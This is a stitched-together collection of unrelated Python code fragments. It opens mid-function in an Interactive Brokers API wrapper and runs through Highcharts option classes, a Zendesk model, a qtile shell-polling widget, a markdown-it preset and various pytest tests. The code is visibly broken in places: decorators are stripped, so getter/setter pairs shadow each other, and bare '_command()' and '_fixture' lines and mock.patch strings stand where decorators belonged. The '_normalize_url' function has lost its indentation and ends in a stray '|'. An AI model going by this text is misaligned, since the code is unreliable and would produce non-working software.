        elif (tickType in (13, 83)):
            ticker.modelGreeks = comp
        self.pendingTickers.add(ticker)
    elif (reqId in self._futures):
        # One-shot calculateImpliedVolatility/calculateOptionPrice request.
        self._endReq(reqId, comp)
    else:
        self._logger.error(f'tickOptionComputation: Unknown reqId: {reqId}')
def deltaNeutralValidation(self, reqId: int, dnc: DeltaNeutralContract):
    """No-op: delta-neutral validation results are ignored."""
    pass
def fundamentalData(self, reqId: int, data: str):
    """Resolve the fundamental-data request with the raw XML string."""
    self._endReq(reqId, data)
def scannerParameters(self, xml: str):
    """Resolve the scanner-parameters request with the raw XML string."""
    self._endReq('scannerParams', xml)
def scannerData(self, reqId: int, rank: int, contractDetails: ContractDetails, distance: str, benchmark: str, projection: str, legsStr: str):
    """Collect one scanner row into the live subscription or the pending
    request; rank 0 marks the start of a fresh result set."""
    data = ScanData(rank, contractDetails, distance, benchmark, projection, legsStr)
    dataList = self.reqId2Subscriber.get(reqId)
    if (dataList is None):
        dataList = self._results.get(reqId)
    if (dataList is not None):
        if (rank == 0):
            dataList.clear()
        dataList.append(data)
def scannerDataEnd(self, reqId: int):
    """Finish a scanner batch: resolve a one-shot request, or emit update
    events for a live subscription."""
    dataList = self._results.get(reqId)
    if (dataList is not None):
        self._endReq(reqId)
    else:
        dataList = self.reqId2Subscriber.get(reqId)
        if (dataList is not None):
            self.ib.scannerDataEvent.emit(dataList)
            dataList.updateEvent.emit(dataList)
def histogramData(self, reqId: int, items: List[HistogramData]):
    """Resolve the histogram request with copied (price, count) entries."""
    result = [HistogramData(item.price, item.count) for item in items]
    self._endReq(reqId, result)
def securityDefinitionOptionParameter(self, reqId: int, exchange: str, underlyingConId: int, tradingClass: str, multiplier: str, expirations: List[str], strikes: List[float]):
    """Collect one option chain for the pending request."""
    chain = OptionChain(exchange, underlyingConId, tradingClass, multiplier, expirations, strikes)
    self._results[reqId].append(chain)
def securityDefinitionOptionParameterEnd(self, reqId: int):
    """Resolve the pending option-chain request."""
    self._endReq(reqId)
def newsProviders(self, newsProviders: List[NewsProvider]):
    """Resolve the news-providers request with copied entries."""
    newsProviders = [NewsProvider(code=p.code, name=p.name) for p in newsProviders]
    self._endReq('newsProviders', newsProviders)
def tickNews(self, _reqId: int, timeStamp: int, providerCode: str, articleId: str, headline: str, extraData: str):
    """Store a live news headline and emit tickNewsEvent."""
    news = NewsTick(timeStamp, providerCode, articleId, headline, extraData)
    self.newsTicks.append(news)
    self.ib.tickNewsEvent.emit(news)
def newsArticle(self, reqId: int, articleType: int, articleText: str):
    """Resolve the news-article request."""
    article = NewsArticle(articleType, articleText)
    self._endReq(reqId, article)
def historicalNews(self, reqId: int, time: str, providerCode: str, articleId: str, headline: str):
    """Collect one historical news headline, parsing its timestamp."""
    dt = parseIBDatetime(time)
    dt = cast(datetime, dt)
    article = HistoricalNews(dt, providerCode, articleId, headline)
    self._results[reqId].append(article)
def historicalNewsEnd(self, reqId, _hasMore: bool):
    """Resolve the pending historical-news request."""
    self._endReq(reqId)
def updateNewsBulletin(self, msgId: int, msgType: int, message: str, origExchange: str):
    """Store a news bulletin by msgId and emit newsBulletinEvent."""
    bulletin = NewsBulletin(msgId, msgType, message, origExchange)
    self.msgId2NewsBulletin[msgId] = bulletin
    self.ib.newsBulletinEvent.emit(bulletin)
def receiveFA(self, _faDataType: int, faXmlData: str):
    """Resolve the financial-advisor request with the raw XML string."""
    self._endReq('requestFA', faXmlData)
def currentTime(self, time: int):
    """Resolve the current-time request with a UTC datetime."""
    dt = datetime.fromtimestamp(time, timezone.utc)
    self._endReq('currentTime', dt)
def tickEFP(self, reqId: int, tickType: int, basisPoints: float, formattedBasisPoints: str, totalDividends: float, holdDays: int, futureLastTradeDate: str, dividendImpact: float, dividendsToLastTradeDate: float):
    """No-op: EFP ticks are ignored."""
    pass
def historicalSchedule(self, reqId: int, startDateTime: str, endDateTime: str, timeZone: str, sessions: List[HistoricalSession]):
    """Resolve the historical-schedule request."""
    schedule = HistoricalSchedule(startDateTime, endDateTime, timeZone, sessions)
    self._endReq(reqId, schedule)
def wshMetaData(self, reqId: int, dataJson: str):
    """Emit Wall Street Horizon metadata and resolve the request."""
    self.ib.wshMetaEvent.emit(dataJson)
    self._endReq(reqId, dataJson)
def wshEventData(self, reqId: int, dataJson: str):
    """Emit Wall Street Horizon event data and resolve the request."""
    self.ib.wshEvent.emit(dataJson)
    self._endReq(reqId, dataJson)
def userInfo(self, reqId: int, whiteBrandingId: str):
    """Resolve the user-info request (the branding id itself is discarded)."""
    self._endReq(reqId)
def softDollarTiers(self, reqId: int, tiers: List[SoftDollarTier]):
    """No-op: soft dollar tiers are ignored."""
    pass
def familyCodes(self, familyCodes: List[FamilyCode]):
    """No-op: family codes are ignored."""
    pass
def error(self, reqId: int, errorCode: int, errorString: str, advancedOrderRejectJson: str):
    """Central error/warning handler.

    Classifies the code as warning or error, fails or resolves the pending
    request, cancels the affected trade, and applies special recovery for
    scanner (165), depth-reset (317) and disconnected-farm (10225) codes.
    Always ends by emitting ``errorEvent``.
    """
    isRequest = (reqId in self._futures)
    trade = self.trades.get((self.clientId, reqId))
    # Codes treated as informational; 2100-2199 are connectivity notices.
    warningCodes = {110, 165, 202, 399, 404, 434, 492, 10167}
    isWarning = ((errorCode in warningCodes) or (2100 <= errorCode < 2200))
    # 110 (price out of range) is a hard error for a pending request or a
    # not-yet-submitted order.
    if ((errorCode == 110) and isRequest):
        isWarning = False
    if ((errorCode == 110) and trade and (trade.orderStatus.status == OrderStatus.PendingSubmit)):
        isWarning = False
    msg = f"{('Warning' if isWarning else 'Error')} {errorCode}, reqId {reqId}: {errorString}"
    contract = self._reqId2Contract.get(reqId)
    if contract:
        msg += f', contract: {contract}'
    if isWarning:
        self._logger.info(msg)
    else:
        self._logger.error(msg)
        if isRequest:
            # Fail or quietly end the pending request.
            if self.ib.RaiseRequestErrors:
                error = RequestError(reqId, errorCode, errorString)
                self._endReq(reqId, error, success=False)
            else:
                self._endReq(reqId)
        elif trade:
            # Error on an active order: mark the trade cancelled.
            if advancedOrderRejectJson:
                trade.advancedError = advancedOrderRejectJson
            if (not trade.isDone()):
                status = trade.orderStatus.status = OrderStatus.Cancelled
                logEntry = TradeLogEntry(self.lastTime, status, msg, errorCode)
                trade.log.append(logEntry)
                self._logger.warning(f'Canceled order: {trade}')
                self.ib.orderStatusEvent.emit(trade)
                trade.statusEvent.emit(trade)
                trade.cancelledEvent.emit(trade)
    if (errorCode == 165):
        # Scanner historical data end: clear and notify the subscription.
        dataList = self.reqId2Subscriber.get(reqId)
        if dataList:
            dataList.clear()
            dataList.updateEvent.emit(dataList)
    elif (errorCode == 317):
        # Market depth reset: empty both books, recording delete ticks.
        ticker = self.reqId2Ticker.get(reqId)
        if ticker:
            ticker.domTicks += [MktDepthData(self.lastTime, 0, '', 2, 0, level.price, 0) for level in ticker.domAsks]
            ticker.domTicks += [MktDepthData(self.lastTime, 0, '', 2, 1, level.price, 0) for level in ticker.domBids]
            ticker.domAsks.clear()
            ticker.domBids.clear()
            self.pendingTickers.add(ticker)
    elif (errorCode == 10225):
        # Bust event: re-subscribe the affected bar subscription.
        bars = self.reqId2Subscriber.get(reqId)
        if isinstance(bars, RealTimeBarList):
            self.ib.client.cancelRealTimeBars(reqId)
            self.ib.client.reqRealTimeBars(reqId, bars.contract, bars.barSize, bars.whatToShow, bars.useRTH, bars.realTimeBarsOptions)
        elif isinstance(bars, BarDataList):
            self.ib.client.cancelHistoricalData(reqId)
            self.ib.client.reqHistoricalData(reqId, bars.contract, bars.endDateTime, bars.durationStr, bars.barSizeSetting, bars.whatToShow, bars.useRTH, bars.formatDate, bars.keepUpToDate, bars.chartOptions)
    self.ib.errorEvent.emit(reqId, errorCode, errorString, contract)
def tcpDataArrived(self):
    """Start a new message batch: stamp the time and reset per-batch tick lists."""
    self.lastTime = datetime.now(timezone.utc)
    for ticker in self.pendingTickers:
        ticker.ticks = []
        ticker.tickByTicks = []
        ticker.domTicks = []
    self.pendingTickers = set()
def tcpDataProcessed(self):
    """Finish a message batch: emit update events for all changed tickers."""
    self.ib.updateEvent.emit()
    if self.pendingTickers:
        for ticker in self.pendingTickers:
            ticker.time = self.lastTime
            ticker.updateEvent.emit(ticker)
        self.ib.pendingTickersEvent.emit(self.pendingTickers)
def format_str(s):
    """Convert a Doxygen block comment into docstring-style text.

    Strips the comment markers, wraps paragraphs at 76 columns and renders
    ``\\note`` / ``\\param`` / ``\\throw`` tags as 'Note:' / 'Inputs:' /
    'Raises:' sections.

    Fixes over the previous version: the ``\\param`` and ``\\throw``
    prefixes were empty strings (``startswith('')`` is always True, so every
    line fell into the param branch), the ``params`` flag was never set to
    True (duplicating the 'Inputs:' header), and a trailing paragraph was
    silently dropped because it was never flushed at the end.
    """
    s = s.replace('/*', '')
    s = s.replace('*/', '')
    s = s.replace('*', '')
    # Drop the first and last (marker) lines and leading whitespace.
    lines = [line.lstrip() for line in s.split('\n')[1:(- 1)]]
    docstring = []
    p = ''  # paragraph being accumulated
    params = False  # True once the 'Inputs:' header has been emitted
    for line in lines:
        if (line.isspace() or (line == '')):
            # Blank line: flush the current paragraph.
            docstring.append('\n'.join(wrap(p, 76)))
            docstring.append('')
            p = ''
        elif line.startswith('\\note'):
            if (p != ''):
                docstring.append('\n'.join(wrap(p, 76)))
                docstring.append('')
            docstring.append('Note:')
            p = line[6:]
        elif line.startswith('\\param'):
            if (p != ''):
                docstring.append('\n'.join(wrap(p, 76)))
                docstring.append('')
            if (not params):
                docstring.append('Inputs:')
                params = True
            p = line[6:].lstrip()
        elif line.startswith('\\throw'):
            if (p != ''):
                docstring.append('\n'.join(wrap(p, 76)))
            docstring.append('Raises:')
            p = ''
        elif line.startswith('- \\ref'):
            p += line[7:]
        else:
            p = (p + line)
    if (p != ''):
        # Flush the final paragraph.
        docstring.append('\n'.join(wrap(p, 76)))
    return '\n'.join(docstring)
def test_apply_withdrawals():
    """Withdrawals are applied to the chain and credited (amounts are in Gwei)."""
    if (not is_supported_pyevm_version_available()):
        pytest.skip('PyEVM is not available')
    backend = PyEVMBackend(vm_configuration=((0, ShanghaiVM),))
    tester = EthereumTester(backend=backend)
    withdrawals = [{'index': 0, 'validator_index': 0, 'address': f"0x{('01' * 20)}", 'amount': 100}, {'index': ((2 ** 64) - 1), 'validator_index': ((2 ** 64) - 1), 'address': (b'\x02' * 20), 'amount': ((2 ** 64) - 1)}]
    backend.apply_withdrawals(withdrawals)
    mined_block = tester.get_block_by_number('latest')
    # Fixed: the previous assertion wrapped a generator expression, which is
    # always truthy and therefore never actually checked anything.
    assert (mined_block['withdrawals'] == [normalize_withdrawal(withdrawal) for withdrawal in withdrawals])
    assert (backend.get_balance((b'\x01' * 20)) == (100 * (10 ** 9)))
    assert (backend.get_balance((b'\x02' * 20)) == (((2 ** 64) - 1) * (10 ** 9)))
    assert (mined_block['withdrawals_root'] == '0xbb49834f60cdfb1a3303cc0f80984c4c7533ecf326bc343d8109127e')
class OptionSeriesLineZones(Options):
    """Highcharts ``series.line.zones`` option proxy.

    NOTE(review): each option appears as a getter/setter pair of identically
    named methods with no ``@property`` / ``@x.setter`` decorators visible;
    as written each setter def shadows its getter. This matches a pattern of
    stripped decorators elsewhere in this file — confirm against the original.
    """
    def className(self):
        # Getter: returns the configured value (default None).
        return self._config_get(None)
    def className(self, text: str):
        # Setter: a custom class name for the zone.
        self._config(text, js_type=False)
    def color(self):
        return self._config_get(None)
    def color(self, text: str):
        # Setter: series color for the zone.
        self._config(text, js_type=False)
    def dashStyle(self):
        return self._config_get(None)
    def dashStyle(self, text: str):
        # Setter: dash style for the zone's graph.
        self._config(text, js_type=False)
    def fillColor(self):
        return self._config_get(None)
    def fillColor(self, text: str):
        # Setter: fill color for the zone.
        self._config(text, js_type=False)
def get_container_tag_from_ref(ref: str) -> str:
    """Map a git ref to a container image tag.

    ``refs/heads/master`` maps to ``latest``; ``refs/heads/release/<v>``
    maps to ``<v>``. Any other ref (or a non-absolute ref) raises SystemExit.
    """
    release_prefix = 'refs/heads/release/'
    if not ref.startswith('refs/'):
        raise SystemExit(f'expected an absolute ref, e.g. `refs/heads/master`, but got `{ref}`')
    if ref == 'refs/heads/master':
        return 'latest'
    if ref.startswith(release_prefix):
        return ref[len(release_prefix):]
    raise SystemExit(f'cannot determine container tag from ref `{ref}`')
class Topic(BaseObject):
    """Zendesk forum topic.

    NOTE(review): the getter/setter pairs below (``created``, ``forum``,
    ``submitter``, ``updated``, ``updater``) carry no ``@property`` /
    ``@x.setter`` decorators; as written each setter def shadows its getter.
    This matches a pattern of stripped decorators elsewhere in this file —
    confirm against the original source.
    """
    def __init__(self, api=None, body=None, created_at=None, forum_id=None, id=None, locked=None, pinned=None, position=None, search_phrases=None, submitter_id=None, tags=None, title=None, topic_type=None, updated_at=None, updater_id=None, url=None, **kwargs):
        self.api = api
        self.body = body
        self.created_at = created_at
        self.forum_id = forum_id
        self.id = id
        self.locked = locked
        self.pinned = pinned
        self.position = position
        self.search_phrases = search_phrases
        self.submitter_id = submitter_id
        self.tags = tags
        self.title = title
        self.topic_type = topic_type
        self.updated_at = updated_at
        self.updater_id = updater_id
        self.url = url
        # Accept and set any extra attributes passed by the API.
        for (key, value) in kwargs.items():
            setattr(self, key, value)
        # Attributes that are still None were not provided by the caller,
        # so they should not be considered dirty (pending update).
        for key in self.to_dict():
            if (getattr(self, key) is None):
                try:
                    self._dirty_attributes.remove(key)
                except KeyError:
                    continue
    def created(self):
        # Parse created_at into a datetime (None if unset).
        if self.created_at:
            return dateutil.parser.parse(self.created_at)
    def created(self, created):
        if created:
            self.created_at = created
    def forum(self):
        # Lazily fetch the owning forum via the API.
        if (self.api and self.forum_id):
            return self.api._get_forum(self.forum_id)
    def forum(self, forum):
        if forum:
            self.forum_id = forum.id
            self._forum = forum
    def submitter(self):
        # Lazily fetch the submitting user via the API.
        if (self.api and self.submitter_id):
            return self.api._get_user(self.submitter_id)
    def submitter(self, submitter):
        if submitter:
            self.submitter_id = submitter.id
            self._submitter = submitter
    def updated(self):
        # Parse updated_at into a datetime (None if unset).
        if self.updated_at:
            return dateutil.parser.parse(self.updated_at)
    def updated(self, updated):
        if updated:
            self.updated_at = updated
    def updater(self):
        # Lazily fetch the updating user via the API.
        if (self.api and self.updater_id):
            return self.api._get_user(self.updater_id)
    def updater(self, updater):
        if updater:
            self.updater_id = updater.id
            self._updater = updater
class ContinuousPoll(_TextBox):
    """Widget that runs a long-lived shell command and displays each output line.

    NOTE(review): the bare ``_command()`` calls before ``stop_process`` and
    ``run_process`` look like stripped ``@expose_command()``-style decorators —
    confirm against the original source; as written they would raise NameError
    at class-body execution unless ``_command`` is defined in an enclosing scope.
    """
    defaults = [('cmd', None, 'Command to execute.'), ('parse_line', None, 'Function to parse output of line. See docs for more.')]
    def __init__(self, **config):
        _TextBox.__init__(self, **config)
        self.add_defaults(ContinuousPoll.defaults)
        self._process = None  # running asyncio subprocess, or None
        self._finalized = False  # set by finalize() to stop the read loop
    async def _config_async(self):
        # Start the subprocess as soon as the widget is configured.
        (await self.run())
    async def run(self):
        """Spawn ``self.cmd`` and stream its stdout lines into the widget."""
        if (not self.cmd):
            return
        # New session (setsid) so the whole process group can be killed later.
        self._process = (await asyncio.create_subprocess_shell(self.cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL, preexec_fn=os.setsid))
        while (not self._finalized):
            out = (await self._process.stdout.readline())
            if (not out):
                # EOF: the process exited; clear the display.
                self.update('')
                self._process = None
                break
            if self.parse_line:
                output = self.parse_line(out)
            else:
                output = out.decode().strip()
            self.qtile.call_soon_threadsafe(self.update, output)
    def _stop(self, kill=False):
        # Terminate (or kill) the whole process group and clear the display.
        os.killpg(os.getpgid(self._process.pid), (signal.SIGKILL if kill else signal.SIGTERM))
        self.update('')
    _command()
    def stop_process(self, kill=False):
        """Stop the running process (SIGTERM, or SIGKILL when ``kill``)."""
        if (self._process is None):
            return
        self._stop(kill=kill)
    _command()
    def run_process(self, command=None):
        """Start the process, optionally replacing ``self.cmd`` first."""
        if (self._process is not None):
            logger.warning('Cannot start process while another is running.')
            return
        if (command is not None):
            self.cmd = command
        asyncio.create_task(self.run())
    def finalize(self):
        # Stop the read loop and the subprocess before widget teardown.
        self._finalized = True
        self.stop_process()
        _TextBox.finalize(self)
def test_repcode_different_no_value(tmpdir, merge_files_oneLR, assert_log, assert_info):
    """A CSINGLE attribute with no explicit value reads back as zeroed complexes."""
    fpath = os.path.join(str(tmpdir), 'different-repcode-no-value.dlis')
    parts = [
        'data/chap3/start.dlis.part',
        'data/chap3/template/default.dlis.part',
        'data/chap3/object/object.dlis.part',
        'data/chap3/objattr/csingle-novalue.dlis.part',
    ]
    merge_files_oneLR(fpath, parts)
    with dlis.load(fpath) as (f, *_):
        testy_object = f.object('VERY_MUCH_TESTY_SET', 'OBJECT', 1, 1)
        assert testy_object['DEFAULT_ATTRIBUTE'] == [0j, 0j]
    # The reader should have logged that the value was never set.
    assert_log('value is not explicitly set')
class OptionSeriesTimelineSonificationDefaultspeechoptionsActivewhen(Options):
    """Generated wrapper for the Highcharts
    `series.timeline.sonification.defaultSpeechOptions.activeWhen` options.

    NOTE(review): each option below is defined twice — a no-argument getter
    followed by a one-argument setter of the same name.  These look like
    ``@property`` / ``@<name>.setter`` pairs whose decorators were
    stripped; as written the later ``def`` shadows the earlier one.
    Confirm against the generator's original output.
    """
    # crossingDown getter (default: None) / setter pair.
    def crossingDown(self):
        return self._config_get(None)
    def crossingDown(self, num: float):
        self._config(num, js_type=False)
    # crossingUp getter (default: None) / setter pair.
    def crossingUp(self):
        return self._config_get(None)
    def crossingUp(self, num: float):
        self._config(num, js_type=False)
    # max getter (default: None) / setter pair.
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    # min getter (default: None) / setter pair.
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    # prop getter (default: None) / setter pair.
    def prop(self):
        return self._config_get(None)
    def prop(self, text: str):
        self._config(text, js_type=False)
# NOTE(review): the bare `_fixture` below looks like a stripped
# `@pytest.fixture` decorator — confirm against the original source.
_fixture
def branches(origin):
    """Create and push a fixed set of branches in the `work` clone.

    Yields ``(origin, branches, middle_branches, border_branches)`` for
    tests that need both "middle" and "border" branch subsets.
    """
    branches = ['f20', 'epel7', 'el6', 'fedora/26', 'rhel-7']
    # Subsets used by tests; together they cover all of `branches`.
    middle_branches = ['el6', 'fedora/26']
    border_branches = ['f20', 'epel7', 'rhel-7']
    # Create each branch locally then push it; `set -e` makes the shell
    # abort (non-zero exit, failing the assert) on the first git error.
    assert (0 == os.system(' set -e\n cd work\n for branch in {branches}\n do\n git branch $branch\n git checkout $branch\n git push origin $branch\n done\n '.format(branches=' '.join(branches))))
    (yield (origin, branches, middle_branches, border_branches))
class TestConstants(unittest.TestCase):
    """Sanity checks over the `constants` module: default flags,
    immutability of constant containers, importability of the
    py3->py2 stdlib mapping, and consistency of requirement pins."""
    def test_defaults(self):
        # Fast pyparsing reprs on, internal-exception embedding off.
        assert constants.use_fast_pyparsing_reprs
        assert (not constants.embed_on_internal_exc)
    def test_fixpath(self):
        # fixpath must preserve the basename's original casing.
        assert (os.path.basename(fixpath('CamelCase.py')) == 'CamelCase.py')
    def test_immutable(self):
        # Public constants must use immutable containers (tuple, frozenset)
        # and otherwise be hashable (or dicts, per assert_hashable_or_dict).
        for (name, value) in vars(constants).items():
            if (not name.startswith('__')):
                assert (not isinstance(value, list)), (('Constant ' + name) + ' should be tuple, not list')
                assert (not isinstance(value, set)), (('Constant ' + name) + ' should be frozenset, not set')
                assert_hashable_or_dict(name, value)
    def test_imports(self):
        # Each mapping entry must be importable: the new name on Pythons
        # at/above the version cutoff, the old name below it — except for
        # combinations known to be absent on this platform/interpreter.
        for (new_imp, (old_imp, ver_cutoff)) in constants.py3_to_py2_stdlib.items():
            if ('/' in old_imp):
                # Entries containing '/' are reduced to their root module names.
                (new_imp, old_imp) = (new_imp.split('.', 1)[0], old_imp.split('./', 1)[0])
            if (((new_imp == 'dbm.gnu') and (WINDOWS or PYPY)) or (PY26 and (old_imp == 'ttk')) or (PYPY and new_imp.startswith('tkinter')) or (PYPY and (old_imp in ('trollius', 'aenum'))) or old_imp.startswith(('typing_extensions', 'async_generator')) or (PY39 and (new_imp == '_dummy_thread'))):
                pass
            elif (sys.version_info >= ver_cutoff):
                assert is_importable(new_imp), ('Failed to import ' + new_imp)
            else:
                assert is_importable(old_imp), ('Failed to import ' + old_imp)
    def test_reqs(self):
        # Pinned and unpinned minimum versions must not overlap; anything
        # with a max version must also be pinned (cPyparsing excepted),
        # and max-version keys must be tagged to a Python version (tuple).
        assert (not (set(constants.unpinned_min_versions) & set(constants.pinned_min_versions))), 'found pinned and unpinned requirements'
        assert (set(constants.max_versions) <= (set(constants.pinned_min_versions) | set(('cPyparsing',)))), 'found unlisted constrained but unpinned requirements'
        for maxed_ver in constants.max_versions:
            assert (isinstance(maxed_ver, tuple) or (maxed_ver in ('pyparsing', 'cPyparsing'))), 'maxed versions must be tagged to a specific Python version'
    def test_run_args(self):
        # The base run args must not hard-code run/quiet/target flags.
        assert ('--run' not in constants.coconut_base_run_args)
        assert ('--quiet' not in constants.coconut_base_run_args)
        assert (not any((arg.startswith('--target') for arg in constants.coconut_base_run_args)))
    def test_targets(self):
        # Every version used by the root header must be a known target.
        assert all((((v in constants.specific_targets) or (v in constants.pseudo_targets)) for v in ROOT_HEADER_VERSIONS))
    def test_tuples(self):
        assert isinstance(constants.indchars, tuple)
        assert isinstance(constants.comment_chars, tuple)
def make() -> PresetType:
    """Return the preset configuration: parser options plus the enabled
    rule lists for the core, block, and inline chains."""
    options = {
        'maxNesting': 20,
        'html': True,
        'linkify': False,
        'typographer': False,
        'quotes': '',
        'xhtmlOut': True,
        'breaks': False,
        'langPrefix': 'language-',
        'highlight': None,
    }
    components = {
        'core': {
            'rules': ['normalize', 'block', 'inline', 'text_join'],
        },
        'block': {
            'rules': ['blockquote', 'code', 'fence', 'heading', 'hr', 'html_block', 'lheading', 'list', 'reference', 'paragraph'],
        },
        'inline': {
            'rules': ['autolink', 'backticks', 'emphasis', 'entity', 'escape', 'html_inline', 'image', 'link', 'newline', 'text'],
            'rules2': ['balance_pairs', 'emphasis', 'fragments_join'],
        },
    }
    return {'options': options, 'components': components}
def make_server_manager(port, authkey):
    """Start a SyncManager that serves a shared job queue and result queue.

    The returned (already started) manager exposes the queues through the
    registered ``get_job_q`` and ``get_result_q`` calls.
    """
    jobs = queue.Queue()
    results = queue.Queue()

    class JobQueueManager(SyncManager):
        pass

    # Register accessors so clients can fetch the two shared queues.
    JobQueueManager.register('get_job_q', callable=lambda: jobs)
    JobQueueManager.register('get_result_q', callable=lambda: results)

    mgr = JobQueueManager(address=('', port), authkey=authkey)
    mgr.start()
    print('Server started at port %s' % port)
    return mgr
def test_paginate_query(in_memory_storage):
    """Page 2 of a 3-per-page query over 10 items is full-sized with correct totals."""
    total_items = 10
    for idx in range(total_items):
        rid = MockResourceIdentifier(str(idx))
        in_memory_storage.save(MockStorageItem(rid, f'test_data{idx}'))

    per_page = 3
    spec = QuerySpec(conditions={})
    result = in_memory_storage.paginate_query(2, per_page, MockStorageItem, spec)

    assert len(result.items) == per_page
    assert result.total_count == total_items
    assert result.total_pages == 4
    assert result.page == 2
class TaskWindowLayout(MainWindowLayout):
    """Main-window layout that resolves dock widgets from a task window's state."""

    # Dock-pane controls handed out so far.
    consumed = List()

    # State of the task window whose dock panes we look up.
    state = Instance('pyface.tasks.task_window.TaskState')

    def _get_dock_widget(self, pane):
        """Return the control for ``pane``'s dock pane, recording it as consumed."""
        match = next((dp for dp in self.state.dock_panes if dp.id == pane.id), None)
        if match is None:
            return None
        self.consumed.append(match.control)
        return match.control

    def _get_pane(self, dock_widget):
        """Return a PaneItem for the dock pane owning ``dock_widget``, if any."""
        for candidate in self.state.dock_panes:
            if candidate.control == dock_widget:
                return PaneItem(id=candidate.id)
        return None
class ColorHelperChangesCommand(sublime_plugin.WindowCommand):
    """Show the ColorHelper changelog, rendered via mdpopups when available."""

    def run(self):
        # Phantom rendering needs mdpopups >= 1.10.0 on Sublime build >= 3124;
        # fall back to inserting the raw markdown otherwise.
        try:
            import mdpopups
            phantoms_ok = mdpopups.version() >= (1, 10, 0) and int(sublime.version()) >= 3124
        except Exception:
            phantoms_ok = False

        text = sublime.load_resource('Packages/ColorHelper/CHANGES.md')
        view = self.window.new_file()
        view.set_name('ColorHelper - Changelog')
        view.settings().set('gutter', False)
        view.settings().set('word_wrap', False)
        if phantoms_ok:
            mdpopups.add_phantom(view, 'changelog', sublime.Region(0), text, sublime.LAYOUT_INLINE, wrapper_class='color-helper', css=CSS, on_navigate=self.on_navigate)
        else:
            view.run_command('insert', {'characters': text})
        view.set_read_only(True)
        view.set_scratch(True)

    def on_navigate(self, href):
        """Open changelog links in the default browser."""
        webbrowser.open_new_tab(href)
def _normalize_url(url):
parsed = parse.urlparse(url)
if parsed.query:
parsed_query = parse.parse_qsl(parsed.query)
query = parse.urlencode(sorted(parsed_query))
parsed = parsed._replace(query=query)
if (('=' in parsed.fragment) and ('&' in parsed.fragment)):
parsed_fragment = parse.parse_qsl(parsed.fragment)
fragment = parse.urlencode(sorted(parsed_fragment))
parsed = parsed._replace(fragment=fragment)
return parse.urlunparse(parsed) |
class OptionSeriesPieSonificationTracksMappingTime(Options):
    """Generated wrapper for the Highcharts
    `series.pie.sonification.tracks.mapping.time` options.

    NOTE(review): each option below is defined twice — a no-argument getter
    followed by a one-argument setter of the same name.  These look like
    ``@property`` / ``@<name>.setter`` pairs whose decorators were
    stripped; as written the later ``def`` shadows the earlier one.
    Confirm against the generator's original output.
    """
    # mapFunction getter (default: None) / setter pair.
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    # mapTo getter (default: None) / setter pair.
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    # max getter (default: None) / setter pair.
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    # min getter (default: None) / setter pair.
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    # within getter (default: None) / setter pair.
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def multiary_multiplication_fixer(bmg: BMGraphBuilder) -> NodeFixer:
    """Build a fixer that collapses chains of binary multiplications
    into a single multiary multiplication node."""
    maf = MultiaryOperatorFixer(bmg, bn.MultiplicationNode)

    def multiary_multiplication_fixer(node: bn.BMGNode) -> NodeFixerResult:
        # Only rewrite nodes the multiary-operator helper says need it.
        if maf._needs_fixing(node):
            inputs = maf.accumulate_input_nodes(node)
            return bmg.add_multi_multiplication(*inputs)
        return Inapplicable

    return multiary_multiplication_fixer
class OptionSeriesWaterfallZones(Options):
    """Generated wrapper for the Highcharts `series.waterfall.zones` options.

    NOTE(review): each option below is defined twice — a no-argument getter
    followed by a one-argument setter of the same name.  These look like
    ``@property`` / ``@<name>.setter`` pairs whose decorators were
    stripped; as written the later ``def`` shadows the earlier one.
    Confirm against the generator's original output.
    """
    # className getter (default: None) / setter pair.
    def className(self):
        return self._config_get(None)
    def className(self, text: str):
        self._config(text, js_type=False)
    # color getter (default: None) / setter pair.
    def color(self):
        return self._config_get(None)
    def color(self, text: str):
        self._config(text, js_type=False)
    # dashStyle getter (default: None) / setter pair.
    def dashStyle(self):
        return self._config_get(None)
    def dashStyle(self, text: str):
        self._config(text, js_type=False)
    # fillColor getter (default: None) / setter pair.
    def fillColor(self):
        return self._config_get(None)
    def fillColor(self, text: str):
        self._config(text, js_type=False)
# NOTE(review): the three bare string expressions below look like stripped
# `@mock.patch(...)` decorators — the mock parameter order below matches
# the reversed decorator order. Confirm against the original source.
('foremast.datapipeline.datapipeline.boto3.Session.client')
('foremast.datapipeline.datapipeline.get_details')
('foremast.datapipeline.datapipeline.get_properties')
def test_get_pipeline_id(mock_get_properties, mock_get_details, mock_boto3):
    """get_pipeline_id() stores the id whose entry name matches the pipeline."""
    # One paginator page with the matching pipeline and a decoy entry.
    test_pipelines = [{'pipelineIdList': [{'name': 'Test Pipeline', 'id': '1234'}, {'name': 'Other', 'id': '5678'}], 'hasMoreResults': False}]
    generated = {'project': 'test'}
    properties = copy.deepcopy(TEST_PROPERTIES)
    mock_get_details.return_value.data = generated
    mock_get_properties.return_value = properties
    mock_boto3.return_value.get_paginator.return_value.paginate.return_value = test_pipelines
    dp = AWSDataPipeline(app='test_app', env='test_env', region='us-east-1', prop_path='other')
    dp.get_pipeline_id()
    # The matching entry's id must be stored on the instance.
    assert (dp.pipeline_id == '1234')
class OptionPlotoptionsSankeySonificationContexttracksMappingFrequency(Options):
    """Generated wrapper for the Highcharts
    `plotOptions.sankey.sonification.contextTracks.mapping.frequency` options.

    NOTE(review): each option below is defined twice — a no-argument getter
    followed by a one-argument setter of the same name.  These look like
    ``@property`` / ``@<name>.setter`` pairs whose decorators were
    stripped; as written the later ``def`` shadows the earlier one.
    Confirm against the generator's original output.
    """
    # mapFunction getter (default: None) / setter pair.
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    # mapTo getter (default: None) / setter pair.
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    # max getter (default: None) / setter pair.
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    # min getter (default: None) / setter pair.
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
